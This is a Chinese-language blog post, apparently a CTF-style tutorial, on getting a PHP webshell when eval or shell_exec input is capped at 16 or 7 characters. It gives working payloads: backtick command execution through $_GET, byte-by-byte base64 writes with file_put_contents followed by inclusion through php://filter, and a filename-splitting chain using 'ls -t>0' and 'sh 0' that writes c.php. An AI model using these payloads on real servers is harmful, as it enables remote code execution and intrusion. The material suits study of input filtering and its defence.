RCE之突破长度限制

我们在写webshell时通常会遇到过滤,但除了过滤之外还可能会有长度限制,这里就简单说一下关于RCE突破长度限制的技巧

突破16位

例如:PHP Eval函数参数限制在16个字符的情况下 ,如何拿到Webshell?

php 复制代码
<?php
$param = $_REQUEST['param']; 
if (strlen($param) < 17 && stripos($param, 'eval') === false && stripos($param, 'assert') === false) 
{
    eval($param);
}

常规写法基本上是param=eval(_POST\[0\]);或者param=_GET0($_POST1);&0=assert&1=??

但这里过滤了eval和assert,第二种写法是绕过了waf,但长度超过了16位,也不行。

反引号

但我们知道,在linux下,反引号是可以执行命令的,所以是否可以用`$_GET1`作为payload?

测试成功

这种方法很简单,那有没有其他方法也可以突破限制呢?

本地文件包含

使用文件包含的方法,param=include$_GET1;16个字符,刚好符合,但难点来了,我们要包含的文件在哪?

使用file_put_contents(N,p,8)

在php官网中可以看到file_put_contents第一个参数是文件名,第二个参数是要传入的值,第三个参数是flag,8表示向文件中追加.

所以我们使用file_put_contents将webshell进行base64编码后写入文件中,在文件包含这个文件,不就可以执行了?

那为什么要进行base64编码呢?因为filr_put_contents无法对一些特殊字符进行追加,所以这里需要进行base64的编码

上传写入文件

这里写一个<?php phpinfo();

编码之后PD9waHAgcGhwaW5mbygpOw==,因为param有长度限制,所以只能一位一位的写入

复制代码
?param=$_GET[1](N,P,8);&1=file_put_contents
?param=$_GET[1](N,D,8);&1=file_put_contents
...

写入成功

包含执行

因为写入的是base64编码的值,无法直接执行,可以使用php://fileter伪协议对文件解码后执行

复制代码
payload=?param=include$_GET[1]&1=php://filter/read=convert.base64-decode/resouse=N

这种方法利用难度较高,但过程是非常巧妙的

突破7位

php 复制代码
<?php
$param = $_REQUEST['param']; 
if( strlen($param) < 8 ) 
{ 
    echo shell_exec($param);
}

这种情况怎么办,之前最短的方法`$_GET1`也有10位,将webshell写入文件就更不行了,无法突破?

文件名组合

linux创建文件:

touch vim > +文件名等

那是否可以将webshell拆开放在文件名里,之后将文件名组合到一个新的文件中然后执行?

我们创建最后执行的文件命令:

bash 复制代码
 echo PD9waHAgcGhwaW5mbygpOw| base64 -d>c.php

因为含有特殊字符无法创建文件,所以这里任然需要使用base64编码

怎么组合?

ls -t 以创建时间来列出当前目录下所有文件,所以可以通过这种方式来组合,但创建文件时需要从后往前创建,同时文件列表是通过\n换行符分割的,所以我们文件名最后需要加上\\来转义

将上面的这条命令拆开创建成文件

bash 复制代码
?param=%3Ehp
?param=%3Ec.p\\
?param=%3Ed\>\\
?param=%3E\ -\\
?param=%3Ee64\\
?param=%3Ebas\\
...

文件创建成功

bash 复制代码
?param=ls -t>0
?param=sh 0

组合成文件0,并运行

成功创建c.php

直接访问c.php

成功突破7位限制

相关推荐
Chengbei118 小时前
VMware Workstation Pro 26H1免费虚拟化利器
运维·安全·web安全·自动化·系统安全·apache·安全架构
老约家的可汗8 小时前
Linux中基础IO
linux·服务器·算法
七夜zippoe8 小时前
DolphinDB告警分析:告警统计与趋势
运维·服务器·统计·告警·趋势·dolphindb
程序员老油条8 小时前
用 n8n 自建自动化:GitHub Push 后自动部署到服务器
服务器·自动化·github
pt10438 小时前
思科网络自动化入门课程介绍
运维·网络·自动化
AI创界者9 小时前
打造内网安全防线:使用 Kali Linux 进行企业级漏洞风险自查与防御指南
linux·运维·安全
CHENKONG_CK17 小时前
晨控CK-FR102ANS-EIP与基恩士KVX520系列PLC配置EtherNet/IP通讯连接手册
网络
@insist12318 小时前
系统规划与管理师-信息安全规划核心考点解析:概述与安全架构
安全·软考·安全架构·系统规划与管理师·软件水平考试·系统规划与管理工程师
草根站起来18 小时前
“双算法SSL证书”伪方案、国产SSL证书营销话术与等保绑定乱象批判
网络·网络协议·ssl
IT小白杨19 小时前
从移动指纹到App隔离:TikTok Shop跨境电商账号安全管理实战
安全·新媒体运营·业界资讯·指纹浏览器